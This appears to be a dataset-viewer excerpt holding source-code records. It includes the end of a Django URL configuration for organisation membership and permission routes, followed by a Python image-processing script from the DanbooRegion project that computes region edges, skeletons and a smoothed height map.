url(r'^org/(?P<uid>[A-Za-z0-9-_]+)/add/$', 'org_add'),
url(r'^org/(?P<uid>[A-Za-z0-9-_]+)/promote/(?P<user_uid>[a-z-.]+)/$', 'org_promote'),
url(r'^org/(?P<uid>[A-Za-z0-9-_]+)/relegate/(?P<user_uid>[a-z-.]+)/$', 'org_relegate'),
url(r'^org/(?P<uid>[A-Za-z0-9-_]+)/enable_ssh/(?P<user_uid>[a-z-.]+)/$', 'enable_ssh'),
url(r'^org/(?P<uid>[A-Za-z0-9-_]+)/disable_ssh/(?P<user_uid>[a-z-.]+)/$', 'disable_ssh'),
url(r'^org/(?P<uid>[A-Za-z0-9-_]+)/enable_admin/(?P<user_uid>[a-z-.]+)/$', 'enable_admin'),
url(r'^org/(?P<uid>[A-Za-z0-9-_]+)/disable_admin/(?P<user_uid>[a-z-.]+)/$', 'disable_admin'),
url(r'^process/(?P<token>[a-z0-9]{32})/$', 'process'),
url(r'^help/$', 'help'),
)
| [
"bertrandbc@gmail.com"
] | bertrandbc@gmail.com |
4b441cce5504aeabb288222da853f57bac341f53 | e8d8aecb5e9031ba1f354c5f0d04075587a03a82 | /code/skeletonize.py | 3e4d3139e244de745998738d46cec36385e6b01b | [
"Apache-2.0"
] | permissive | UdonDa/DanbooRegion | 6bf425494bada965ced00463db8fcf8f19dfd7e4 | bf6fc66bec0d585efece2865d3251f52186882b5 | refs/heads/master | 2022-12-06T12:48:31.428187 | 2020-07-20T06:33:21 | 2020-07-20T06:33:21 | 284,989,195 | 0 | 0 | Apache-2.0 | 2020-08-04T13:32:41 | 2020-08-04T13:32:40 | null | UTF-8 | Python | false | false | 1,460 | py | from tricks import *
from skimage.morphology import skeletonize, dilation
def get_skeleton(region_map):
Xp = np.pad(region_map, [[0, 1], [0, 0], [0, 0]], 'symmetric').astype(np.float32)
Yp = np.pad(region_map, [[0, 0], [0, 1], [0, 0]], 'symmetric').astype(np.float32)
X = np.sum((Xp[1:, :, :] - Xp[:-1, :, :]) ** 2.0, axis=2) ** 0.5
Y = np.sum((Yp[:, 1:, :] - Yp[:, :-1, :]) ** 2.0, axis=2) ** 0.5
edge = np.zeros_like(region_map)[:, :, 0]
edge[X > 0] = 255
edge[Y > 0] = 255
edge[0, :] = 255
edge[-1, :] = 255
edge[:, 0] = 255
edge[:, -1] = 255
skeleton = 1.0 - dilation(edge.astype(np.float32) / 255.0)
skeleton = skeletonize(skeleton)
skeleton = (skeleton * 255.0).clip(0, 255).astype(np.uint8)
field = np.random.uniform(low=0.0, high=255.0, size=edge.shape).clip(0, 255).astype(np.uint8)
field[skeleton > 0] = 255
field[edge > 0] = 0
filter = np.array([
[0, 1, 0],
[1, 1, 1],
[0, 1, 0]],
dtype=np.float32) / 5.0
height = np.random.uniform(low=0.0, high=255.0, size=field.shape).astype(np.float32)
for _ in range(512):
height = cv2.filter2D(height, cv2.CV_32F, filter)
height[skeleton > 0] = 255.0
height[edge > 0] = 0.0
return height.clip(0, 255).astype(np.uint8)
if __name__=='__main__':
import sys
region_map = cv2.imread(sys.argv[1])
cv2.imshow('vis', get_skeleton(region_map))
cv2.waitKey(0)
| [
"914847518@qq.com"
] | 914847518@qq.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.